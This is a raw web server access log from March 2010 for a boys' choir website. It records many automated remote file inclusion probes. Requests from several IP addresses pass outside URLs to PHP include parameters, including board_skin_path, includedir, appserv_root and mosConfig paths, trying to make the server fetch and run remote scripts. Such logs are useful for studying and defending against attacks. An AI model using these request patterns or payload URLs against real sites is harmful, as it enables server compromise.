67.227.136.138 - - [09/Mar/2010:11:10:21 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:21 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:22 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:22 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:22 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:24 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:24 -0800] "GET /logs/access_100205.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:24 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:24 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:24 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:24 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:26 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:26 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:26 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:27 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:27 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:27 -0800] "GET /logs/access_100205.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:30 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:30 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:10:30 -0800] "GET /logs/access_100205.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.97.178.7 - - [09/Mar/2010:11:11:19 -0800] "GET /logs/access_091111.log/Components/errors.php?error=http://mensagemwebbr.info/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:11:45 -0800] "GET /logs/access_100126.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:11:45 -0800] "GET /logs/access_100126.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.97.178.7 - - [09/Mar/2010:11:11:51 -0800] "GET /logs/access_100130.log/Components/errors.php?error=http://mensagemwebbr.info/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
148.85.45.164 - - [09/Mar/2010:11:12:04 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:01 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:01 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:01 -0800] "GET /logs/access.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:05 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:05 -0800] "GET /logs/access.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:05 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:08 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:24 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:24 -0800] "GET /logs/access.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:24 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:50 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:50 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:50 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:51 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:51 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:13:51 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:02 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:02 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:02 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:03 -0800] "GET /logs//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:03 -0800] "GET /board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:03 -0800] "GET /logs/access_100205.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.224.94.218 - - [09/Mar/2010:11:14:22 -0800] "GET /logs/access_091111.log%20%20/Components/errors.php?error=http://www.ykaaa.com/images/attributes/color_pirma.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.224.94.218 - - [09/Mar/2010:11:14:22 -0800] "GET /logs/Components/errors.php?error=http://www.ykaaa.com/images/attributes/color_pirma.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.224.94.218 - - [09/Mar/2010:11:14:22 -0800] "GET /Components/errors.php?error=http://www.ykaaa.com/images/attributes/color_pirma.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:24 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:14:27 -0800] "GET /logs/access_091213.log%20%20//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:14:27 -0800] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:14:27 -0800] "GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:14:28 -0800] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:14:28 -0800] "GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:14:28 -0800] "GET /logs/access_091213.log%20%20//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:44 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:46 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:11:14:49 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:11:14:49 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:11:14:49 -0800] "GET /appserv/main.php?appserv_root=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:14:54 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:15:05 -0800] "GET /logs/access_100202.log%20%20//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:15:07 -0800] "GET /logs/access_100202.log%20%20//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:11:15:15 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:11:15:15 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.206.36.25 - - [09/Mar/2010:11:15:20 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 200 1726 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.206.36.25 - - [09/Mar/2010:11:15:20 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 200 1089 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.206.36.25 - - [09/Mar/2010:11:15:20 -0800] "GET /logs/access_100205.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.206.36.25 - - [09/Mar/2010:11:15:27 -0800] "GET /logs/access_091111.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:12 -0800] "GET /logs/access_100205.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:13 -0800] "GET /logs/access_100205.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:15 -0800] "GET /logs/access_100205.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:16 -0800] "GET /logs/access_100205.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:26 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:27 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:29 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:31 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:33 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:35 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:45 -0800] "GET /logs/access_100228.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:45 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:17:52 -0800] "GET /logs/access_100213.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:18:00 -0800] "GET /logs/access_100228.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.12 - - [09/Mar/2010:11:19:23 -0800] "GET /logs/access_100205.log/sub.php?s=http://www.designjetparts.eu//administrator/components/com_virtuemart/classes/errors.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.12 - - [09/Mar/2010:11:19:23 -0800] "GET /logs/sub.php?s=http://www.designjetparts.eu//administrator/components/com_virtuemart/classes/errors.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.12 - - [09/Mar/2010:11:19:23 -0800] "GET /sub.php?s=http://www.designjetparts.eu//administrator/components/com_virtuemart/classes/errors.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.170.118 - - [09/Mar/2010:11:19:25 -0800] "GET /logs/access_091111.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.224.94.218 - - [09/Mar/2010:11:20:03 -0800] "GET /logs/access_100130.log%20%20/Components/errors.php?error=http://www.ykaaa.com/images/attributes/color_pirma.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.170.118 - - [09/Mar/2010:11:20:19 -0800] "GET /logs/access_100117.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:21:52 -0800] "GET /logs/access_100228.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:22:14 -0800] "GET /logs/access_100228.log%20%20//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:25:32 -0800] "GET /logs/access_100213.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:25:36 -0800] "GET /logs/access_100228.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:25:59 -0800] "GET /logs/access_091213.log//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
79.174.78.178 - - [09/Mar/2010:11:26:04 -0800] "GET /logs/access_100202.log//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:28:19 -0800] "GET /logs/access_100213.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:28:22 -0800] "GET /logs/access_100213.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:28:36 -0800] "GET /logs/access_100213.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:28:48 -0800] "GET /logs/access_100228.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:29:38 -0800] "GET /logs/access_100213.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:29:53 -0800] "GET /logs/access_100228.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:30:02 -0800] "GET /logs/access_100213.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:11:30:17 -0800] "GET /logs/access_100228.log//board/bbs//write_comment_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.210.178 - - [09/Mar/2010:11:30:35 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.210.178 - - [09/Mar/2010:11:30:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.210.178 - - [09/Mar/2010:11:30:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.210.178 - - [09/Mar/2010:11:30:45 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirate